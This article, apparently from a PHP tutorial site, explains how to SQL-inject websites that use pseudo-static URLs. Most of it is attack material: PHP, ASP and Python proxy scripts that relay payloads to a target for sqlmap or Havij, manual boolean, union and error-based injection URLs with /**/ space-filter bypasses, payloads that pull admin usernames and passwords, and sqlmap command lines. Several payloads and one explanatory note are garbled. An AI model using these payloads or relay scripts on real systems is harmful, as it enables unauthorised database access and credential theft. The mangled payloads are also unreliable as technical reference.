This article mainly introduces PHP's pseudo-static injection. It summarizes and analyzes the common injection situations of PHP against pseudo-static in the form of examples. It also comes with related operation codes of asp and Python. It has certain reference value for PHP program security. It is needed. Friends can refer to it, I hope it can help everyone.
1: Transfer injection method
1. Do it through http://www.xxx.com/news.php?id=1 After pseudo-static, it becomes like this
http://www.xxx.com/news.php/id/1.html
2. Test steps:
Transit injection php code: inject.php
<?php set_time_limit(0); $id=$_GET["id"]; $id=str_replace(” “,”%20″,$id); $id=str_replace(“=”,”%3D”,$id); //$url = "http://www.xxx.com/news.php/id/$id.html"; $url = "http://www.xxx.com/news.php/id/$id.html"; //echo $url; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "$url"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 0); $output = curl_exec($ch); curl_close($ch); print_r($output); ?>
3. Build PHP in the local environment, and then visit http://127.0.0.1/inject.php?id=1
Injection vulnerabilities can be run through sqlmap or havj.
Appendix ASP transfer code:
<% JmdcwName=request("id") JmStr=JmdcwName JmStr=URLEncoding(JmStr) JMUrl="http://192.168.235.7:8808/ad/blog/" //实际上要请求的网址 JMUrl=JMUrl & JmStr&".html" //拼接url response.write JMUrl&JmStr //我这里故意输出url来看 'JmRef="http://127.0.0.1/6kbbs/bank.asp" JmCok="" JmCok=replace(JmCok,chr(32),"%20") JmStr=URLEncoding(JmStr) response.write PostData(JMUrl,JmStr,JmCok,JmRef) //url,查询字符串,cookie,referer字段 Function PostData(PostUrl,PostStr,PostCok,PostRef) Dim Http Set Http = Server.CreateObject("msxml2.serverXMLHTTP") With Http .Open "GET",PostUrl,False .Send () PostData = .ResponseBody End With Set Http = Nothing PostData =bytes2BSTR(PostData) End Function Function bytes2BSTR(vIn) //处理返回的信息 Dim strReturn Dim I, ThisCharCode, NextCharCode strReturn = "" For I = 1 To LenB(vIn) ThisCharCode = AscB(MidB(vIn, I, 1)) If ThisCharCode < &H80 Then strReturn = strReturn & Chr(ThisCharCode) Else NextCharCode = AscB(MidB(vIn, I + 1, 1)) strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode)) I = I + 1 End If Next bytes2BSTR = strReturn End Function Function URLEncoding(vstrin) //发包前对参数的url编码一下 strReturn="" Dim i 'vstrin=replace(vstrin,"%","%25") '增加转换搜索字符, 'vstrin=Replace(vstrin,chr(32),"%20") '转换空格,如果网站过滤了空格,尝试用/**/来代替%20 'vstrin=Replace(vstrin,chr(43),"%2B") 'JMDCW增加转换+字符 vstrin=Replace(vstrin,chr(32),"/**/") '在此增加要过滤的代码 //这里很关键,方便啊,把空格自动换成/**/,后面会说到的 For i=1 To Len(vstrin) ThisChr=Mid(vstrin,i,1) if Abs(Asc(ThisChr))< &HFF Then strReturn=strReturn & ThisChr Else InnerCode=Asc(ThisChr) If InnerCode<0 Then InnerCode=InnerCode + &H10000 End If Hight1=(InnerCode And &HFF00) \&HFF Low1=InnerCode And &HFF strReturn=strReturn & "%" & Hex(Hight1) & "%" & Hex(Low1) End if Next URLEncoding=strReturn End Function %>
2. Manual injection method
1.http://www.xxx.com/play/Diablo.html
http://www.xxx.com/down/html/?772.html
2. Test injection:
http://www.xxx.com/down/html/?772′.html
http://www.xxx.com /play/Diablo'.html
http:// www.xxx.com/play/Diablo'/**/and
/**/1='1 /*.html
http://www.xxx.com/play/Diablo'
/**/and
/**/1='2 /*.html
http://www.xxx.com/page/html/?56′/**/and/**/1=1/*.html Normal
http://www.xxx.com/page/html/?56′/**/and/**/1=2/*.html Error
3. Check whether there are differences in the pages. If they are the same, Doesn't exist, different exists injected.
4. Union query:
http://www.xxx.com/play/diablo' and 1=2 union select 1,2… frominformation_schema.columns where 1='1. html
http://www.xxx.com/page/html/?56'/**/and/**/(SELECT/**/1/**/(select/**/from/**/count(* ),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/group/**/a)b)=1/*.html
Manual injection method (2)
http://www.xxx.net /news/html/?410.html
http://www.xxx.net/news/html/?410'union/**/1/**/(select/**/concat(user,0x3a,password)/**/select/**/pwn_base_admin/**/0,1),0x3a)a/**/information_schema.tables/**/count(*),concat(floor(rand(0)*2),0x3a,(select/**/by/**/where'1'='1.html
Note:
Pseudo-static injection is not the same as ordinary GET injection of URL
. %20, %23, +, etc. injected by get of ordinary URLs can be used; however, pseudo-static does not work and will be passed directly to the URL, so use /**&*/limit/**&*&*&*&*&*/a)b/**&*/This comment symbol Indicates spaces.
##3. SQLmap method
Add *http:// wherever there is a pseudo-static injection point in sqlmap. www.cunlide.com/id1/1/id2/2
python sqlmap.py -u “http://www.xxx.com/id1/1*/id2/2″
http://www .xxx.com/news/class/?103.htm
python sqlmap.py -u “http://www.xxx.com/news/class/?103*.html”
4. python script method
Code:##
from BaseHTTPServer import * import urllib2 class MyHTTPHandler(BaseHTTPRequestHandler): def do_GET(self): path=self.path path=path[path.find('id=')+3:] proxy_support = urllib2.ProxyHandler({"http":"http://127.0.0.1:8087"}) opener = urllib2.build_opener(proxy_support) urllib2.install_opener(opener) url="http://www.xxx.com/magazine/imedia/gallery/dickinsons-last-dance/" try: response=urllib2.urlopen(url+path) html=response.read() except urllib2.URLError,e: html=e.read() self.wfile.write(html) server = HTTPServer(("", 8000), MyHTTPHandler) server.serve_forever()
The above is the detailed content of PHP shares pseudo-static injection examples. For more information, please follow other related articles on the PHP Chinese website!